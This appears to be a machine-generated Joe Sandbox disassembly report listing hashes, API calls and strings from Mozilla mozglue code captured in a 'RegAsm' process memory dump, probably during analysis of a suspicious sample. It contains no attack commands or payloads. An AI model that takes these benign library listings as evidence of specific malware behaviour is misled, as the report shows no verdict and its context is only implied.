                                                                                                                                                        • Opcode ID: 7428b47c0400ee30af2ca7b196917403ac203b17c3066d654b41df602062b7de
                                                                                                                                                        • Instruction ID: 198c88e9938d850a91bc16b888d59b33eb5a72ecf2ded81720292ed566d4a178
                                                                                                                                                        • Opcode Fuzzy Hash: 7428b47c0400ee30af2ca7b196917403ac203b17c3066d654b41df602062b7de
                                                                                                                                                        • Instruction Fuzzy Hash: D4A17E746183819FC715CF25C480BAEBBF2BF89308F54895DE88A87751DB70E849CB96
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C624777
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 4275171209-1351931279
                                                                                                                                                        • Opcode ID: 2acc62b44510e416a62a50c85144a462fc3fe987a5e9a39e28314a02b39e36ae
                                                                                                                                                        • Instruction ID: 66e8a9f5b9e75e7a9bd833c9c40706962c8d8cb345b897af4bd77fdb7a1ee8b0
                                                                                                                                                        • Opcode Fuzzy Hash: 2acc62b44510e416a62a50c85144a462fc3fe987a5e9a39e28314a02b39e36ae
                                                                                                                                                        • Instruction Fuzzy Hash: 32B28D71A166018FC318CF18C590725BBE2BFC5324B29C76DE86A8B6E9D775D841CF88
                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3732870572-0
                                                                                                                                                        • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                        • Instruction ID: f9d3bff78544cdf3ef70669f7b5d46c33e7168f33fa8f3de550c445da0109ac9
                                                                                                                                                        • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                        • Instruction Fuzzy Hash: 65327231F001198BDF18CEADC4A17AEB7B2FB89304F15853AD506FBBA0D6349D458B96
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 0-3731770368
                                                                                                                                                        • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                        • Instruction ID: 1d94e05a20308442e2acf94f33bffc52907afa162bdcd8c1afaa69981a86f59a
                                                                                                                                                        • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                                                                                                        • Instruction Fuzzy Hash: BC321971E002198FDB25CF98C890AADFBF2FF88308F648569C549A7745D731A986CF94
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ~q`l
                                                                                                                                                        • API String ID: 0-3731770368
                                                                                                                                                        • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                        • Instruction ID: 7cc1f4d1a7277ddfb6b591ec876d729a85cc9dc3d1abbbe71549c9c506f0bb5e
                                                                                                                                                        • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                                                                                                        • Instruction Fuzzy Hash: 12220871E002198FCB25CF98C980AADF7F2FF89304F6485A9C549A7745D731A986CF94
                                                                                                                                                        APIs
                                                                                                                                                        • memcmp.VCRUNTIME140(?,?,6C614A63,?,?), ref: 6C645F06
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                        • Opcode ID: c85ad555fb831d0ddcb95c3b05f13bf5accf2641c2a3abeef3a04a84d651fcf0
                                                                                                                                                        • Instruction ID: e6e8adfe6c0b8ff8e8f9f7f1703b0936a4e97b43bd55bcefbe26b5a72865a75f
                                                                                                                                                        • Opcode Fuzzy Hash: c85ad555fb831d0ddcb95c3b05f13bf5accf2641c2a3abeef3a04a84d651fcf0
                                                                                                                                                        • Instruction Fuzzy Hash: 76C19D75E012099BCB04CF95C5906EEBBF2BF8A318F28C15DD8556BB44D732A806CF94
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                        • Instruction ID: 38d752a9143138f86ac685898b8d67295e06892267e550e03b78a35cf96c5f13
                                                                                                                                                        • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                        • Instruction Fuzzy Hash: 6B222871E04629CFDB14CF98C890AADF7B2FF89304F549259C54AAB705D731A986CF84
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(user32,?,6C63E1A5), ref: 6C665606
                                                                                                                                                        • LoadLibraryW.KERNEL32(gdi32,?,6C63E1A5), ref: 6C66560F
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C665633
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C66563D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C66566C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C66567D
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C665696
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6656B2
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6656CB
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6656E4
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6656FD
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C665716
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C66572F
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C665748
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C665761
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C66577A
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C665793
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6657A8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6657BD
                                                                                                                                                        • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6657D5
                                                                                                                                                        • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6657EA
                                                                                                                                                        • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6657FF
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                        • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                        • API String ID: 2238633743-1964193996
                                                                                                                                                        APIs
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C61582D), ref: 6C64CC27
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C61582D), ref: 6C64CC3D
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C67FE98,?,?,?,?,?,6C61582D), ref: 6C64CC56
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C61582D), ref: 6C64CC6C
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C61582D), ref: 6C64CC82
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C61582D), ref: 6C64CC98
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C61582D), ref: 6C64CCAE
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C64CCC4
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C64CCDA
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C64CCEC
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C64CCFE
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C64CD14
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C64CD82
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C64CD98
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C64CDAE
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C64CDC4
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C64CDDA
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C64CDF0
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C64CE06
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C64CE1C
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C64CE32
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C64CE48
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C64CE5E
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C64CE74
                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C64CE8A
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: strcmp
                                                                                                                                                        • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                        • API String ID: 1004003707-2809817890
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C614730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6144B2,6C68E21C,6C68F7F8), ref: 6C61473E
                                                                                                                                                          • Part of subcall function 6C614730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C61474A
                                                                                                                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6144BA
                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6144D2
                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C68F80C,6C60F240,?,?), ref: 6C61451A
                                                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C61455C
                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 6C614592
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C68F770), ref: 6C6145A2
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C6145AA
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C6145BB
                                                                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C68F818,6C60F240,?,?), ref: 6C614612
                                                                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C614636
                                                                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C614644
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C61466D
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C61469F
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146AB
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146B2
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146B9
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6146C0
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6146CD
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C6146F1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6146FD
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                        • String ID: Ghl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                        • API String ID: 1702738223-1697825190
                                                                                                                                                        • Opcode ID: 57e494da0f094402da4492d4c287b15640b2567bfc2ea795833e4bcefda82464
                                                                                                                                                        • Instruction ID: 4d67c582b539b8c2998a5596f37f6c7f27f0cd6f4cd2e883db706734afbf2ed2
                                                                                                                                                        • Opcode Fuzzy Hash: 57e494da0f094402da4492d4c287b15640b2567bfc2ea795833e4bcefda82464
                                                                                                                                                        • Instruction Fuzzy Hash: 116106B060A244BFEB008F66CC89BA577B8EB8734DF148458E5049BA41D7F19545CFBE
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F70E
                                                                                                                                                        • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C64F8F9
                                                                                                                                                          • Part of subcall function 6C616390: GetCurrentThreadId.KERNEL32 ref: 6C6163D0
                                                                                                                                                          • Part of subcall function 6C616390: AcquireSRWLockExclusive.KERNEL32 ref: 6C6163DF
                                                                                                                                                          • Part of subcall function 6C616390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C61640E
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F93A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F98A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F990
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F994
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F716
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                          • Part of subcall function 6C60B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C60B5E0
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F739
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64F746
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64F793
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C68385B,00000002,?,?,?,?,?), ref: 6C64F829
                                                                                                                                                        • free.MOZGLUE(?,?,00000000,?), ref: 6C64F84C
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C64F866
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64FA0C
                                                                                                                                                          • Part of subcall function 6C615E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C615E8C
                                                                                                                                                          • Part of subcall function 6C615E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615E9D
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentThreadId.KERNEL32 ref: 6C615EAB
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentThreadId.KERNEL32 ref: 6C615EB8
                                                                                                                                                          • Part of subcall function 6C615E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615ECF
                                                                                                                                                          • Part of subcall function 6C615E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C615F27
                                                                                                                                                          • Part of subcall function 6C615E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C615F47
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentProcess.KERNEL32 ref: 6C615F53
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentThread.KERNEL32 ref: 6C615F5C
                                                                                                                                                          • Part of subcall function 6C615E60: GetCurrentProcess.KERNEL32 ref: 6C615F66
                                                                                                                                                          • Part of subcall function 6C615E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C615F7E
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64F9C5
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C64F9DA
                                                                                                                                                        Strings
                                                                                                                                                        • " attempted to re-register as ", xrefs: 6C64F858
                                                                                                                                                        • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C64F9A6
                                                                                                                                                        • [D %d/%d] profiler_register_thread(%s), xrefs: 6C64F71F
                                                                                                                                                        • Thread , xrefs: 6C64F789
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                                                                                                        • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
                                                                                                                                                        • API String ID: 882766088-1834255612
                                                                                                                                                        • Opcode ID: 615947939281b75202b3ec2460df6c8628033a2be0064cd5bfb7d7db37454c11
                                                                                                                                                        • Instruction ID: d19e5019abd572985766ff6b75d74a469f59f45d7d56e6d92eec387f5e8073c0
                                                                                                                                                        • Opcode Fuzzy Hash: 615947939281b75202b3ec2460df6c8628033a2be0064cd5bfb7d7db37454c11
                                                                                                                                                        • Instruction Fuzzy Hash: 7D810671A05200AFD710DF25C880AAAB7B5EFC6308F55C56DE8459BB51EB30D849CBAF
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EE60
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EE6D
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EE92
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C64EEA5
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C64EEB4
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C64EEBB
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EEC7
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64EECF
                                                                                                                                                          • Part of subcall function 6C64DE60: GetCurrentThreadId.KERNEL32 ref: 6C64DE73
                                                                                                                                                          • Part of subcall function 6C64DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C614A68), ref: 6C64DE7B
                                                                                                                                                          • Part of subcall function 6C64DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C614A68), ref: 6C64DEB8
                                                                                                                                                          • Part of subcall function 6C64DE60: free.MOZGLUE(00000000,?,6C614A68), ref: 6C64DEFE
                                                                                                                                                          • Part of subcall function 6C64DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C64DF38
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EF1E
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EF2B
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EF59
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EFB0
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EFBD
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64EFE1
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EFF8
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64F000
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C64F02F
                                                                                                                                                          • Part of subcall function 6C64F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C64F09B
                                                                                                                                                          • Part of subcall function 6C64F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C64F0AC
                                                                                                                                                          • Part of subcall function 6C64F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C64F0BE
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_pause, xrefs: 6C64F008
                                                                                                                                                        • [I %d/%d] profiler_stop, xrefs: 6C64EED7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                        • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                        • API String ID: 16519850-1833026159
                                                                                                                                                        • Opcode ID: a49d98490e3fa1e4e1f8dcd7776d480c74bca506ab2d42d2dac3f8d42ea58bc4
                                                                                                                                                        • Instruction ID: 6f68a383f755f4ecae97d7c59711952f76fe380b3263bd77d7547f44db4d66a7
                                                                                                                                                        • Opcode Fuzzy Hash: a49d98490e3fa1e4e1f8dcd7776d480c74bca506ab2d42d2dac3f8d42ea58bc4
                                                                                                                                                        • Instruction Fuzzy Hash: 1651E635602210BFDB00AB66D888BA97BB4EF87358F10C526E91583B42D7754809CBBF
                                                                                                                                                        APIs
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615E9D
                                                                                                                                                          • Part of subcall function 6C625B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6256EE,?,00000001), ref: 6C625B85
                                                                                                                                                          • Part of subcall function 6C625B50: EnterCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625B90
                                                                                                                                                          • Part of subcall function 6C625B50: LeaveCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625BD8
                                                                                                                                                          • Part of subcall function 6C625B50: GetTickCount64.KERNEL32 ref: 6C625BE4
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C615EAB
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C615EB8
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615ECF
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C616017
                                                                                                                                                          • Part of subcall function 6C604310: moz_xmalloc.MOZGLUE(00000010,?,6C6042D2), ref: 6C60436A
                                                                                                                                                          • Part of subcall function 6C604310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6042D2), ref: 6C604387
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000004), ref: 6C615F47
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C615F53
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C615F5C
